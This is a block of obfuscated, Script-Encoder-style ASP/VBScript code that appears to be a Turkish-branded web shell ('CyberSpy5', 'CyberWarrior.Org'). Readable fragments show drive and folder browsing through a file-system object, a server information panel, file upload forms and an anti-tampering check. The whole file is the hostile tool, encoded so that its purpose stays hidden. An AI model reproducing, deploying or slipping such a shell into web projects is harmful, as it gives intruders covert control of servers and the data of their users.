q~2SpJS8FBF#L:b[`rz&JBFST*[:b[`rsWM;h{hlDt bd2r~q~Zb[sk[crn:m\/dlTncbdaJBF~Z#@#@&YM'ODL:r[vJ~8S!BSWTrURz/a~0RTEBFS!*':bNcEBFFSfB!9+6C!VOZFr~%BF*':bNcJJzES8~!*':bN`r&&Rr~2~q#'hbNcJBT!8~fSW&RfSyFS&BEBFSZ#L:k9`rC/r~q~y#'hbN`rC/r~FBTb[sk9`E~f yRSFBf~2R)daRWES8~T#LhbNcr~WR~8~2SDcbdwr~qSZ#[srNvJ Jn&zr~8~T#'hbNcJB+~8~fScRz+SyFS&BEBFSZ#@#@&4M'r'x(/2i,[U8kwi,'x(/wp~@!Ym4^+~hr[DtxJrq!Z]EE,4W.[DxJrqZJE,mVVkwm^k	oxJr!EE,m+^swmNNbUL'rJOJE@*E@#@&Y.'D.[sk[cr~FqS2~+JBqB!bL:bN`r~Zq~2~+JBFST*[:b[`rD+2*fcr~8~T#'hbNcJ4OYa)&&dWmCs4WdYrS8~T*[skNvJ2E~8~T#L:r[vJq	2lT+?O;wr~2~q#@#@&DDxK9vSxc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#}4L!G/D+MPxP\r9`G4N2lDtS(	/Y.]\cW(%alO4~r-J*_8SSxcW(L2CDt#*@#@&DV'D.':bNvJrx[nXRC/aE~8~TbL:k[crRE~8SZ#'sk9`JJzrSFB!b[sk[crvvB+FB&~pESF8~8#':r[vJ&zrSFB!b'skNcEwW.EsmhlO4Rz/wr~8S!*[hk9`EKs{Hd/mo+c)dwr~8~T#@#@&UlOkMxJ@!YC8^+PAr9Y4'rE8!TuJrP4KD9nD{JEFZJE~1+V^dwmmk	LxJr*rJ~mns^wCN9rxT'EEWJJ@*E@#@&)Dsxr}EEI;E/D ?D-+M.C.bl4^n/vJ?;](n:{gb\2EbLSnxv]+$EndDR?n.7+..m.bl8^+k`JUZ"(n:{Hbt2Eb*@#@&UCYbD'r@!Ol(VPAk[O4'EJ8T!uJE~(WD[nM'EJ8TrJ~1+^V/al1rxT'EJlJE~1+V^2l9Nk	LxJrcrJ@*J@#@&DVxYM':bNcE+v~+qB&SirS8FS8#L:k9`r&zr~q~Z#'hbN`roWME:|KCY4Rz/2JSqB!b[srNvJKh|H+ddmonRzdaJS8~Z#@#@&Y^xYM[hk9`Er	N+X lkwJBqS!*[sk[`E r~q~Zb[sk[crzzES8~T#LhbNcrv+~ 8~2Sir~qFBFb'skNvEzJJ~8ST#L:bNcJoGMEh{hCY4R)daJ~qSZ#':b[vJKs{t+/klTnRz/2JBFST*@#@&UnD7+DjC.k(V/~'~E@!K[@*rv[sk[cr~ qS2~f&2+B!Xc&WJ~8~Zb[sk[`rRS+WF~yq~2~~2SfJBFB!b@#@&4D'E@!DC4^+~AbNY4xrJq!ZYrJ~(WMN+M'rEFZJEP1+sskwl1rxT'JrXEJ,mVswC[9kUo{EJWJE@*r@#@&8.{J'x(dai~Lx(/wpPLU4kwIP@!YC8^+PSrNDt'rEq!Z]rJ~4G.9+.'rEFZJE~1+Vsdal^k	L{JEZJrPmV^2l9NrxT'EEOJJ@*E@#@&YV{hrNvJyJSFSq*[hk9cJB qS2~&ffy~T*cfWJS8~Z#[sk9cJc~+c8~+qB&~Bf~2J~8ST#E?D-+.#mDrl(s+k`Ej;IqKP|1)HAE*#@#@&Y^':bNvE r~q~8#'hbN`rS 8~&Bff&y~Z* &*EBFS!*':bNcEc~ qS2~E~8SZ#'sk9`Jc~y*FB q~2~SfB&JBq~Z#@#@&jnD7+M.CDr8^+dP{~YMB'hbN`ESyFS&Bf2&+B!lR&WJBq~Z#':bNcEc~ Wq~yF~2SS&B&r~q~Tb@#@&OV{ODL:r[vJz&EBFS!*'sk[vJwWD!:|KlDt bkwES8~!*':bN`rKh{t+k/Con z/2JBq~Z#vJx`]n$En/D U+.7+M.lMkm8V/cJUZ](hK{g)HAJ#*@#@&Y^'sk[`E+r~q~8b[sk[cr~ qS2~f&2+B!Xc&WJ~8~Zb[sk[`rRS+8~&BE~8~!*'hk9`rR zES8~T#Lhk9`E B FSfB&&&c)kwEBFB!#L:b[`rRS WFS+8~&BS&B&JBqS!*@#@&?;4~$KV;:UiAv#@#@&"+/2G	/nRq.bYn,ZH4+Mm.DbW.{"WGOUlX6CAm/k,'~J@!ZxO+.@*@!sGxD~smmnxEkUL9kUokv,?r.+{B_y!E@*@!(@*E[zDh'r@!z(@*@!JsW	O@*@!(D@*J'J@!/xO+M@*@!wWUO,?k"n{BXB@*@!(@*E,[,?+M\..mDr4^+d~LPJ@!&4@*@!zwGUY@*@!JZnxOnM@*E[r@!4@*J'Pm4Vn'r@!&4@*@!(D@*r@#@&4D{JLU4kwI@!Dl8sPhb[Y4'JrqT!uJrP8W.[DxJrq!rJ~^VVd2mmrxTxrJTrJ,m+^VaCN9kUo{JE1rJ@*r@#@&"+/aGU/RqDrYn~r@!CP4.+6'E'kYXsnL;'ksLLJ~DlMo+D'Em4^lU3E@*@!WKxY,dk.+'Efv@*r[b:L[E@!J0GxD@*@!Jl@*@!JZ+UOD@*J@#@&(Dxr[	4/ai,'x(/2i,[U8kwi,@!Ym4V~Ak9Y4'EJqTZ]EJ,8WMNn.{JJqTrJ~ms^/2mmbxo{JrTJrP^+^V2C9Nk	L'rJ,rE@*J@#@&DVxY.'sk[`rvB qS2~iES8FSF*'sk[vJJzJBFBT#L:rNvJoGME:|KlDtRzd2JBFB!b[hr9`EnsmH/dCT+R)daJSFBT*@#@&DV{YDL:b[`rkUN6 CkwJBq~Z#[sr[`rRr~q~TbL:rNvEzJJSqB!#'hbNcJ+B qB&BiJBF8SF*[hk9`E&JJ~8S!*[:b[cJwWMEh{KCDt bk2JBFST*[:r[vJK:|\/dmoRbkwrSFB!b@#@&4.xr[x(dwpP[	8dwpPLx8/2I,@!Ol(s+,hr[Dt'EE8!T]rE,4GMND'rJ8TJrP^+^Vd2mmk	L'rJ!rE~mV^wCN[r	oxJr1Jr@*E@#@&2x[~UE8@#@&O^'OM[skNvJ+~yFS&BiES8F~8b[skNvE&zr~8~T#'hbNcJwGD!:mKmYt )kwE~8SZ#'sk9`Jh:|\+k/CoR)daJ~8S!*@#@&(.xJLx(/2i~'	4dwp~[	4d2pP@!OC(VnPSr9Y4{JrF!Z]rEP(W.NDxErF!rEP1+V^d2l1k	oxJETrJ~msVal[[bxoxEr,EJ@*E@#@&O^'DD[sk9cJbx[+XRCdaJ~8S!*[:b[cJcJBFS!b'sk[`r&zr~qSZ#[hr9`Ev+SyFS2~pJ~8FBq#L:rNvJ&&r~FBT#L:k9cEsKD!:mnCO4R)/aE~8~TbL:k[crnh{tnk/CT+cb/aJBq~Z#@#@&bs~]botDcH;l/Sq#,@!@*PEwE~:tnx=]+kwGUk+R	.bYnPr/H4nM?aXPlPJ~|KN~5YVrkky1nPG+�k�Dr.k^kHW.R  r)]+k2W	/n AxN@#@&bs~Km8^+~@!@*,KkDV~K4+U)"+d2Kx/ MkY~E�laDmy~|GUDDGVe~ZH4n.UwX~X,z~|K[,5nD3b/k.m~f�k�OkMksrHWDc Rr)Id2W	/R3x[@#@&?;4,/X(+.	mDDrGM{!WM;	Y;^+UE4v#i@#@&ikoPsk[ctZlkn~F~ *~@!@*,JaXEPP4xlIdwKxdncDrOPEZH8DjaX,*PJP;z4DRmD.rKDR}.or)Id2W	/R3x[@#@&d]+k2W	/n qDkOn,J@!mUD+.@*@!6WDsP	C:'v0KDhqEP:OtKN'E2G/DB,l^YrG	'EPL~I;;nkYRjnM\nDjCMkC(V/`r?;]qhKm1zH3E*P[,E@*r@#@&i]n/aW	/nR	.bYnPr@!k	w;O,YX2n{BdE(hbYv,xm:+{BU;4skOB,\Cs!+'E~P,PIKGOP,P,B@*J@#@&iIn/aGxk+ 	MkYn~r@!&0K.s@*@!JmxYD@*E@#@&@#@&dbs~PMk:v]+$E+kO p!+MXjY.r	ocJ;	nmDChYDnE*#~',EMWGDJ,Ktx@#@&di?nY,0dxU+D7nDcZDCO+K4N+^YcEUm.kaOk	o obV+jzkYn:}8N+^DJ*@#@&idUnY,?;D!m;PbwV.k{0/c[.k7+k@#@&d@#@&id]+k2W	/n SDkOn,J@!0KUDPWmm'Bqk	LNbxL/EPdr.+'Eq!E@*@!(@*l@!J4@*@!&0GUD@*~@!(@*4~jD\n.@!z8@*r@#@&d7"+kwW	/ MkO+,J@!WKxY,Wl1+'rECDbl^JEPdr.+xJr+Jr@*E@#@&dd]nkwGxknch.bYPJ@!4M@*@!(D@*J@#@&77wWD,3l1tP9.r\P&1~?;.!m;Kb2VDr@#@&dd7dDDxNMr7+ 9Db\+^+DO+MP'Pr)E@#@&ddi]+kwW	dnRqDbYnPE@!(@*@!l,4D0xErJP'~"+5EdDRjD7+DjlMrl(Vn/vJj/"qn:m1zH2rb~[,JQZ	nC.m:nYMn'rP'~kYD~',JEJ@*E,[~`Zm/+v/D.#,[~J@!zC@*@!z4@*@!4M@*J@#@&7di@#@&d7djn^+^Y,/lk+~[Mk\n GDr\PHwn@#@&iddiZmd+,!@#@&id77i?EM;m!Kkar~',J`xVxGA	J@#@&i7didj;MEm;)9PxP9.b\nc.KVEs+gC:@#@&did7/m/+,q@#@&ddi7]+kwKxd+ AMkO+,E@!6WUO,0l^n{B	k	L9kUT/EP/byxBFB@*@!(@*@!@!J4@*@!&0KxY@*@!8D@*J@#@&7d77i?;D!^E:k2r,'PE��VmD�sl(r^k.,fb/3r@#@&7did7kwP[.b\+cr/M+l9z~K4+	@#@&d77id7?!.E1E)[,'P[.b\nRjG^Eh1m:+@#@&i7did3Vk+@#@&iddi7dUED!^;b9P{PEJ@#@&id7di3x9Pro@#@&d77iZC/~y@#@&ididI/aGxk+ hMkOn,J@!6GxDP0m^n'EbxLNrUT/vPkry'v{E@*@!8@*p@!&4@*@!J0G	Y@*@!4M@*r@#@&id7di?;.!mE:rwbP',Ejl(kDP9kdVr@#@&di7diko~9Dk-nckdDC9X~:tx@#@&di7didjEME^;zNP{~NMk\ #W^Es+Hlhn@#@&7di7dAVdn@#@&d77id7?!.!m;zN,'PrJ@#@&did7dAx[~bs@#@&7didZmdnP2@#@&d7d7]/2W	d+ch.rD+PE@!6WUY,Wmmn{BqkxTNbUokB~/bynxEGB@*@!4@*i@!J8@*@!J0KxO@*@!8M@*E@#@&7did7j!DE^;:k2k,x,J)�,?�M�m�/�r@#@&7did7kwP[.b\+cr/M+l9z~K4+	@#@&d77id7?!.E1E)[,'P[.b\nRU4mDngls+@#@&di7di2s/@#@&7iddi7?!DE1;)N,',JE@#@&7id7dAUN,ko@#@&dd77;ld+,*@#@&7idiI+kwKU/RADbYn~r@!0KUY,0l1nxBqk	o[kULkB~/b"+{B{v@*@!4@*@*@!z8@*@!&6WUD@*@!4D@*J@#@&did7dUE.;1EKb2k,'Pr/9O"WsJ@#@&77id7kw~NMk-nck/.nmNzP:4x@#@&diddidU;D!m;b9Px~9Dk7nRjWV!hn1m:@#@&d77id3Vkn@#@&d77iddj;ME^Ez[,'~rJ@#@&didi72	N~kw@#@&7idd;C/P*@#@&7did"+dwGUk+ hMrYPE@!6WxO~6l^+{vqkUTNbxokB,dk.+xBFB@*@!(@*i@!&4@*@!z6GUY@*@!(D@*J@#@&id7dijEME^;:kwr~{PEIz\,frk3r@#@&idi7dbs~NMk-nck/Mnl9XP:4nx@#@&id7d77UE.E1;b9Px~9Dk-nc.GV!h1Cs+@#@&didi72^/n@#@&d77iddU;D!mEz[~',Jr@#@&d77id3x9~kw@#@&7id2U[,?nV^D@#@&idiks,:b[`b:L~2~+b,@!@*,E4JP:4nx=I/2WUdR	DbO+,J/z(+Dj2HPXPJ~;X8D lMDbGDcr.or)]nkwW	d+c2x9@#@&didbs~:r[vkhoBf~y#~@!@*PJ8nrP6D,hbNctZm/+BGB+#,@!@*PrwzE,KtU)"+/aGU/RqDrYn~rZz4.?aX~X,zP/z(+.OqCMDrKDcrDTJ=]+kwGxk+ 3	N@#@&7diks,hrNvksoS%S+*P@!@*,ElMJ~P4+xl]/2W	dR	MkD+PrZH8+M?2X,*~&,|W9~5Y3bdry1+,fn�k�OrMkskHGDr)]nkwWUdR3x9@#@&d7iD/wKxknRSDrYPE@!(@*?�M�^�)@!z4@*~EPLPUE.E^;:k2k,'Pr@!8.@*J@#@&7id.+k2KxdRSDkD+,E@!(@*r/b:l~@!z4@*EPLP?!.;m!b9P'PE@!(D@*J@#@&did.nkwWUdRADbOPE@!4@*fWkXm~?b/O+skl~@!z4@*E@#@&ddiroP9Db\nRrdM+CNH~K4+U@#@&dd77k+OPk2{0dcoYNMk7n`kY.#@#@&77idDdwKx/ ADbYPdw WbVn/HdY:~',J@!8.@*J@#@&i7i2sk+@#@&didMn/aWU/RA.bY+,EO@!4D@*E@#@&idi2UN~rw@#@&di7I/2G	/+ 	MkO+,E@!4@*~W�,bVmx=~@!J4@*J@#@&77iks,[Db\+crdDl9X~K4n	@#@&di7d6Dnnkwl^n,'~`9.b\ncb7lk^l(s+UwCmP&~8!cRXG+#@#@&77di/Y~/2x6/ oONMk-nv/Y.b@#@&7di7M+daW	/+chMrY`]W!x[c6D+dwmm+BqbPLPrP\A@!8M@*E#@#@&did3sk+@#@&7id7DdaWUk+chDbYcJ @!8D@*Jb@#@&ddi3x9Pkw@#@&did"+dwGUk+ MrYPE@!(@*KG2^lhPnCaldbY)P@!z(@*J@#@&7diko~9Dk7nRb/DC[X,K4+U@#@&7id7YKOl^/2C1+Px~vN.k7ncKGDl^?k.+,&P8!*%lGb@#@&di7dk+Y,d2'6/conY[.b\n`kOD*@#@&7idd.nkwGxknch.bY`IKE	[`DWOl^/2C1+~8bPLPJ,\$@!(D@*Jb@#@&7id3Vkn@#@&d77iD+d2Kxd+cAMkO`rO@!(D@*E#@#@&7di2U[,ks@#@&didId2W	/R	DrOPE@!(.@*r@#@&7i1+aO@#@&7d"nkwG	/RMkDnPr@!&0KxO@*r@#@&i7?YP6d~',1KY4kUL@#@&7dUnY,?;.!mEPraVnDb~{PHKY4kxT@#@&7dk+OPkwxHKYtbUo@#@&dAsd+@#@&id7ko~sk[`bhoB&S+*P@!@*~r4nJ,6MPhbNvHZm/SGB bP@!@*~EaXJ,Ptx)"ndwKxk+ .rD+~J;z4Dj2HP*~&,Zz4. CMDbWDcrMLJ=In/aWUdR2	[@#@&ddiroPsk9`r:LSR~+#,@!@*,JC.rPK4n	)]+k2KxdRqDkD+,EZH4nDUwz~lPz,FW9P5OVkkk.mnP9n�b�YrDbskHW.E=I+d2Kxd+c3	N@#@&di@#@&id@#@&dikoPsk[c:kY^n~O~F*~@!@*,J�rPPtnU=In/aGxk+ 	MkYn~rZz4.Uwz,*,zP;X(nD CDMkG.crDTE)"+/aGU/RAx[@#@&@#@&d7kw~:bNcP9~F{S8#~@!@*~r�J~:tx)"+k2W	/nRqDrOPJ;z4D?az~*,z,|GN~eYVkkry1+~9�k�Yr.bVrXK.r)]/aWxk+c3x9@#@&di?nO,r4No?}P',/.+mYr8Ln^D`E?1.kaYrUTRsrs?z/Dnsr8N+1YJ*@#@&7dU+OPtWU]wP{~r(LsU6 MYwWsNn.vZ	nm.ls+O.#@#@&7ikoPsr9`P9~8v~y#,@!@*,J.�J,K4n	)IdwKx/ 	DbYPEZz8DjwH~*,z~/H4+.Rql.DbGMR6Mor)I/aGxk+ 2	N@#@&id?OPzxlGr"k	VD~'~\Kx]+a ?!4oG^N+.d@#@&7dbo,Sn6YvbDs~8bP@!@*~J\J~P4+x=]+kwW	dnRqDbYnPE/H4nD 	lMDrGMRr.Lr)]+k2KxdRAxN@#@&i7?Y~ZKVor^+/Z~',HW	]nwcsbVn/@#@&idrs,hk9`rhT~%S+*P@!@*,EmDE,K4+x=IdwKxd+c.rD+Pr/X(+DU2zPlPJPFW[~I+O3bdk.mn~G+�k�OrMkskHGMJl"+kwW	/ 2	N@#@&id@#@&idIdwKx/ 	DbYPE@!OC(VnPSrNDtxv8!B~8KD[+MxE!v,l^ko	'E^+	YnDEP@*E,@#@&i7I/wKUd+cMkO+~E@!Y.@*,EP@#@&7oKDP3C1t~NMr7+m,k	PW(Lwjrcf.k7+d@#@&ddboPskNvP[~8vB bP@!@*,J.�J,Ptxl]/wGUk+ MrD+~rZH4+M?azPlP&P;X8nMOm.DbWDc6.or)"+dwGUk+ 2	[@#@&d7]/wGUk+ MrD+~r@!DNPSk9Ot{Bq]E@*E@#@&dd"n/aWxkn MkD+~J@!WKDhP	C:'vWKD:qv,:nY4G9'vaWkYB,l1OkKxxBQZ	KmDlsnYM+'r'~NMk7+mR9.b\nSOYD'E=B@*E@#@&d7IdaWUk+cDbY~J@!kUw!Y~OHw+{v/!4:bOvP	ls+xBj;(:rYE~\mV;n{PB~E,[~P9.b\n|RGDk7+dnYD+.PLPE~E@*JLE@!JsWMh@*J@#@&id]+d2Kxd+c	DbYn~r@!zO[@*J@#@&@#@&i1nXY@#@&d@#@&i7@#@&d]+kwGUk+Rq.kD+Pr@!ON,hbNOtxv8]v@*r@#@&iIndaWxdnc.kDn,J@!6WM:P	lsn'E0GDsFv~s+Y4GN{BwKdOB,l1YrWUxrJEPL~I;;nkYRjnM\nDjCMkC(V/`r?;]qhKm1zH3E*P[,Eg;nm.C:YM+xDGGDJE@*r@#@&iko~skNcPm4s+B1BFb,@!@*PJ�rP:4+	)]+kwGUk+Rq.kD+Pr/z4DUwzPX~JP/X(nD C.MkW. }DLJ=]/2Kxk+RAx9@#@&iIn/aWUdRMrYPJ@!rUw!Y,YzwnxE/;4srYEPUCs+'vj!4hkDv,\C^E'BcR=v@*r@#@&d"+d2Kx/ MkY~E@!J0KDh@*E@#@&d]+k2W	/n qDkOn,J@!zD[@*J@#@&d@#@&d@#@&i7I/2W	/n qDkDnPr@!zD.@*J@#@&id]+d2Kxd+c	DbYn~r@!zOC(Vn@*r@#@&d7@#@&iBMbYwGDsPxP"+5;/Yc5`rMkDoGDsJ*@#@&d7rwPJ+6O`zDhS8#P@!@*,JtJ,)	N~sk9`Km4^n~O~q#,@!@*~r�JP:4+	)Id2W	/R	DrOPEZH8+MO	CMDkG.cr.orl"+daW	/+c2	[@#@&d7I/2G	/+c	DbY+,E@!0KDsPUlhn{BWWMh EPhnDtW[xEonYE~mmObW	'BQB@*E@#@&P7d"+d2Kx/ MkY~EP@!k	w;Y~OHwn'EO+XYv~7lV;n{J'ZqKmDCs+DD+LJ,Uls+xB;KCMl:ODB@*r@#@&diI/2WUdR	DbO+,J~@!bxw;O,YzwxE/;(:bYB,xmh+{BjE(:rOEP\msE'BVrOB@*J@#@&7d]nkwGxknRqDrOPJ@!&6W.:@*E@#@&7ikwPS0DcKm4s+B b~@!@*Pr/XrPK4nU)"+kwGxdnc.kDnPr|G[ElP\�[mtCV~7l.cRcPZH4.Oql.DbW. }DorlI/wKUd+c2	N@#@&77"+dwKU/R	.bY+~E@!0GDs~	lh'E0WM:2vPs+OtKNxvaW/DvPmmYbGU'EgmmOkGU{fG/HCbMlhCE@*J@#@&id]+k2KxdRqDkD+,EP@!kUw!Y~OHw+{vY6YE~-l^E'~J'/qnCDmh+DDn'rPxCh'v1.NnwWM:B@*J@#@&Pid]+kwGUk+Rq.kD+Pr~@!k	w!Y~Yz2'vYaYEPdr.+'vqyB~\ms!+xE:94B,xmh+{B)DmsG.sB@*r@#@&idId2W	/R	DrOPEPz[�Pb�kU[J@#@&7iIn/aG	/ncMkYPr@!k	w;Y,Yz2'B14+134KavP	ls+xB/z(+.m.DbW.mzDlF.bYnDE~7ls!+{Bb9kb^k	NnbMlv@*r@#@&i7@#@&dd"ndwKxk+ .rD+~J,@!k	w;O,YX2n{BdE(hbYv,xm:+{BU;4skOB,\Cs!+'E)DmB@*r@#@&diI/2WUdR	DbO+,J@!&6WDh@*r@#@&di@#@&d@#@&di0WMPCm4PWW^Nn.&Y+s~k	Pb	C9k.k	VnD@#@&idvIdwKxdncDrOP64NnVWdD+M`0KV9nD&Yn:cwCO4#@#@&7d	+6D@#@&di@#@&d7IndaWU/ MkOn,J@!8.@*J@#@&bo,:r9`:N~8vB+#,@!@*PrD�E~}DPsrNvk:TSf~y#,@!@*PE8J~rM~:bNcrso~0Sy#~@!@*~rl.rP:t+	)"n/aWU/R	.bY+,EZH4+Mj2X,*,z~Zz8DRm.DbW. }DoEl"+dwKUk+ Ax9@#@&"+k2W	/nRqDrOPJ@!Ol(V+,ArNDt{B* Yv,4GD9nD{BTv,m+sskwCmbUT'v8B,m+^VaCN9kUo{BTv,4o1GVKD'E:T!Z!Z!v@*E@#@&In/aGxk+ 	MkYn~r@!OD,8TmG^WM'B[&2f&2&v@*r@#@&rwP:b[`tZlknSGB *P@!@*~EaXEP}.Pd+WOvbDhS8#~@!@*~r}E,rMP:bNvPNBF{~8#~@!@*PJ�r~K4+x=]n/aW	/nR	.bYnPrFW9PenD3kdr.mnPGn�b�YrMk^kXKD,&P;X8+MO	CMDkK.R}Dorl]+kwKxd+ 3	N@#@&"n/aWUdR.rD+~J@!O9P^KVkwl	'E+B@*Zz4D~Hm\kTC/HWx@!&ON@*J@#@&]+d2Kxd+c	DbYn~r@!zO.@*J@#@&"nkwG	/RMkDnPr@!OD@*J~@#@&I+k2W	/+c	.kD+,J@!Y[~1Ws/aCx{B+v@*@!0GUDPdk.n{B*EP6lm'E)DblsB@*Pr�s:Pnslk�D�P{~EPLP;Kl.Cs+OD~[r@!&oKxY@*E@#@&rs,hbNc:l(V+B,Bq#,@!@*Pr�J~P4+x=]+kwW	dnRqDbYnPE/H4nDU2X,*~&,ZX8nMO	lM.bW.crMoJ=IdwKxd+c2U[@#@&IdwKx/ 	DbYPE@!8.@*J@#@&boPsk[ctZldnBGS *~@!@*~rwHJP:tU)"+dwKxdncDbO+,JZH8nDUwHPXP&~;X8+MRmD.rKDR6.TJlIdaWUk+c2x9@#@&]+kwGxk+ 	MkY~J@!zYM@*E@#@&kwPhk[c:l8VS,BFb~@!@*PE�E,K4+	l"+daW	/+cMrYPEZH4n.UwX,XPJPZH8nD mD.kG.cr.orlI/2G	/+ 3	N@#@&"nkwG	/RMkDnPr@!OD,4L^KVWMxB[!!ZTT!E@*r@#@&IndaWU/ MkOn,J@!O[@*@!WW	O,0C1+{BbxT[k	odB,/r"'B+v@*7@!z6GUY@*@!JY[@*E@#@&In/aGxk+ 	MkYn~r@!ON@*E@#@&]/aWxk+c	DbYnPr@!oG	YPwCm'ZK;.kD,1nhS~;W;DbnDBPhG	WPdr.+xF@*ELJemyslPI+DVkkklPr[E@!J0W	O@*rP[,E@!sKxDPWl^n{rxT[k	od@*r[5C"sle+DVb/rLJ@!zsKxD@*J@#@&]+kwGUk+Rq.kD+Pr@!8D@*J@#@&]+d2Kxd+c	DbYn~r@!sGUDPol1n{ZG!Db+D,1A~,ZGEMkn.BP:KUW,/k.nxF@*JLJ63;hmPe+DVkkkl~r[J@!&6WUY@*E,[~r@!wWxDP6Cm'	k	o[r	o/@*E[}3EsCe+D3b/r[E@!JsGxD@*J@#@&]nkwWUdR	DbOPE@!4M@*J@#@&"n/aWU/R	.bY+,E@!wWxD~ol1+{ZGE.rD~1A~,ZG;Mk+.S,:GxK~kk"'8@*JLJUrVs+~5YVrkk),E[r@!z6GUY@*J,[~J@!oKxOP6Cm'	r	oNrUT/@*JLjbVh5Y3b/b'J@!zoW	Y@*E@#@&IdwKx/ 	DbYPE@!&O9@*E@#@&]+kwGUk+R	.bYnPr@!JY.@*J@#@&I/aGxk+ MkOn,J@!(.@*@!4D@*E@#@&bs,:rNcPm4s+B1~8#~@!@*PJ�E~:tnx=]/2Kxk+RqDbO+,J/X(+.jaXPl~z,ZX(n.OqlMDrW. }DLJ=]+kwGUk+R3U9@#@&IdaWUk+cDbY~J@!Y.P(o^G^WD{vaZ!!ZTTB@*J@#@&]+d2Kxd+c	DbYn~r@!Y[@*@!0GxD~6l^'Ek	o9rxT/vPkk"n{BvE@*�@!J0W	O@*@!JY9@*E@#@&rwPPl(s+,@!@*~:kYsn,K4+	l"+daW	/+cMrYPE�laDC",|W	ODKV",/z4DUwzPX~JPFW9~5YVrkky^n,fn�k�DrMksbXKDRcRrlI/2W	/n AxN@#@&I/wKUd+cMkO+~E@!Y[@*@!CP4DnW{JJ:ErPGx1sbmV{JrLl7lk^DbwO)9W^;s+xD Wa+xvvEPLP"+5EndDRj+M-+M.C.bl4snk`E?;]&nP|1zH2r#,'PrgCmDkGU{Ew^Gl9[wmO4'rPLP]+2smmn`;	nmDChYDnSr-E~rkr#~LPrB~,B;	nKw;wE~vAbNY4xcl!~4nro4Y{&T!Sd1DGV^8lM/xeA?~.nkk"l(sBbrJ@*fWkXm~jaVGl9@!&C@*@!zD[@*r@#@&bo~:bNvKC4snB,SF*~@!@*PE�E,KtnU=In/aG	/ncMkYPr/X(+.?aX~X,zP;z4DOqC.DbWMR6DLE=In/aGxk+ 3	N@#@&rwPhk9ctZCk+BG~y#,@!@*,J2XrP6.,S+6O`zD:BqbP@!@*,JtJ~6MPhk9cK9~q{BF#~@!@*PE�J,P4+U=I/wKxknRqDrYPEFKNPInY0k/b"^+,f�k�Ok.r^kzWM~z,Zz8DO	CMDrWM }DLr)"+/aW	d+c2UN@#@&]nkwW	d+cDbOnPr@!JY.@*E@#@&koPsrNvKC8^+~1S8#~@!@*~r�J~:tx)"+k2W	/nRqDrOPJ;z4D?az~*,z,Zz4n. CDMrWMR6.TJ)]nkwGxknc2U9@#@&dd"+k2W	/nRqDrOPJ@!OD,4o1GsWM'EaT!TTZ!v@*r@#@&id]nkwWUdR	DbOPE@!Y9@*@!6W	OPkk"+{Bv,0l1n'Ek	L[k	okB@*�@!&WKxO@*@!&Y9@*E@#@&ddro,:rNv\;ld~F~ *P@!@*PrwzJ,r.~d+0DcbM:~8b~@!@*Pr}EP6.,:rNvPNBF{S8#P@!@*,J�EP:4xl"+kwW	/ MkO+,JFG9P5O3b/k.^nPG+�b�YrDrsbXGD,&P;X8nMOC.MkGDc6MoE=I/wKxknRAx[@#@&d7]/wKU/RMrO+,J@!Y[@*@!C,t.+6xJraEE,Wx^sbmV'rENl-m/1DkaY=[W1Eh+	Y Ga+xvvJ,[P"n5E/DRj+.-D#lMrl(VndvJ?/]&nP{g)t2E*PLPJQl1OkKxx:m/d';X4.mDDbG.{:WaV;|CO^kC:{O+kY'2mYtxE,[~I2^l^`;nmDmh+DDn~r-ESruJ*~[,JBB~vZqnKw;wvSEhrND4'+!TS4+kL4D'f!ZSkm.KV^4lM/{e2U~.+kk"C(V+EbJr@*?bdO+sPbyrxsnMk~KdY@!zC@*@!z0GUD@*@!zD[@*J@#@&diI+kwKU/R	DbYn~r@!zD.@*r@#@&i7rs,:bNcKC8^+S,Bq#,@!@*~r�JPP4xlIdaWUk+cDbY~J;X8+M?2z,*PJ~ZH4+MR	lMDbW.R6.TJlIdwKxdnc2x[@#@&d7IdaWUk+cDbY~J@!Y.P(o^G^WD{vaZ!!ZTTB@*J@#@&7dro,:rNv\Zm/nSF~ b~@!@*~JazrPP4+	)I/aGxk+ MkOn,J|K[PI+Y0rdk.mP9+�r�ObDrVbzWMP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&dd"n/aWxkn MkD+~J@!O9@*@!0KUY,/r"'Bv@*@!8@*@!WKxO,0mm+{BqrxTNrxT/v@*�@!z0KUY@*@!z(@*@!z6W	Y@*@!&O9@*E@#@&7d"+d2Kx/n qDrY~r@!O9@*,@!l,tMn0{JEarJ~G	mVb^3{JJNC-lkmMk2Yl[Km;:UYcW2n	`BE~LP]+$;/Oc?D\DjCDbl8V/cEUZI&KK|1bt3E#,[,J_l^ObWU'sC/k[/z(+D	CMDrWMm:W2^EnlY^kmh';X8+MC.MkWMmf0l1n6|LwmY4'E~LP]+asl1+c/qnl.Cs+ODSr-EBJ-J#,[,EBBPvZqnG2!wBBvhbNY4x{*Z~4+ro4O{vT!BdmMWss(lDdxI2j~Mnkk"m4^+B*Jr@*K�sPjkD+snMkP_Cm0V+@!&C@*r@#@&d7IndaWU/ MkOn,J[U8kwIu,@!mP4M+6'JrarEPKx^VbmVxrJLm-lkmDb2O)9W1Eh+UOcW2+	cBrP'~"+;;nkY ?.7+.jlMkl(Vd`r?/I&nPmgbHAE#,[Pr_CmDkKxxkh4m[2lD4'rP'~"+wsC1+cZqKmDCs+DD+BJ'E~ruE#,[~EE~PE/hWw!2v~EhbNOtx*Z!Stro4YxfW!~d^MWsV(CM/xI2U~D/b"l(VnB*JE@*n+x9rxbPks4CPY@!zC@*E@#@&d7kw~:bNcPm4VnSO~q#,@!@*PE�rP:t+	)"n/aWU/R	.bY+,EZH4+Mj2X,*,z~Zz8DRm.DbW. }DoEl"+dwKUk+ Ax9d@#@&di]+kwGxk+ 	MkY~J@!zY9@*E@#@&diIn/2G	/nRq.kD+~E@!zY.@*r@#@&dirwPhbNvKl(VS,BFbP@!@*~E�rPK4nx=I+k2Gxk+c.kOn,J/X(nDUwz~lPz~/H4nD 	mD.bWMRrMorlI/2W	/n AxN@#@&diI+k2Gxk+c.kOn,J@!YM~4TmGsKD'v:Z!T!ZTE@*E@#@&idI/aGxk+ MkOn,J@!D[@*@!0W	O~/by'vvv@*@!0GxD~0mmnxEkUL9kUokv@*�@!&(@*@!z0KxD@*@!J0GxD@*@!&DN@*r@#@&idId2W	/R	DrOPE@!D[@*@!l~4M+0xEraEJ,G	